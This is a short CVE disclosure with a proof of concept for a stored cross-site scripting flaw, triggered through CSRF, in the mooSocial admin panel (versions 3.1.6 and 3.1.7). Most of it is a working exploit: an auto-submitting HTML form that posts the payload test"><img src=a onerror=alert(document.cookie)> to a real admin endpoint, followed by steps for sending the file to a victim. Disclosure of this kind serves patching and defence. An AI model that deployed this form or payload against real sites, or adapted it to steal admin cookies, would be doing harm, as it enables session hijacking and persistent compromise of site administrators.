# CVE-2023-40869 Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions XSS STORE via CSRF. #Paths Affected http://admin-socialcommerce.moosocial.com/admin/group/group_categories http://admin-socialcommerce.moosocial.com/admin/coupon/ http://admin-socialcommerce.moosocial.com/admin/menu/manage/edit_menu/6 Poc: 1 - Make a file with this HTML and with and include XSS PAYLOAD <html> <body> <form action="http://admin-socialcommerce.moosocial.com/admin/group/group_categories/save" method="POST"> <input type="hidden" name="data[id]" value="" /> <input type="hidden" name="data[name]" value="test"><img src=a onerror=alert(document.cookie)>test" /> ##payload in this example and encoded : test"><img src=a onerror=alert(document.cookie)>test <input type="hidden" name="data[type]" value="Group" /> <input type="hidden" name="data[header]" value="0" /> <input type="hidden" name="data[header]" value="1" /> <input type="hidden" name="data[parent_id]" value="0" /> <input type="hidden" name="data[description]" value="" /> <input type="hidden" name="data[active]" value="0" /> <input type="hidden" name="data[active]" value="1" /> <input type="hidden" name="data[everyone]" value="0" /> <input type="hidden" name="data[everyone]" value="1" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> 2 - Example test.html 3 - Send to the victim 4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click the code will inject a payload and will be store at the DataBase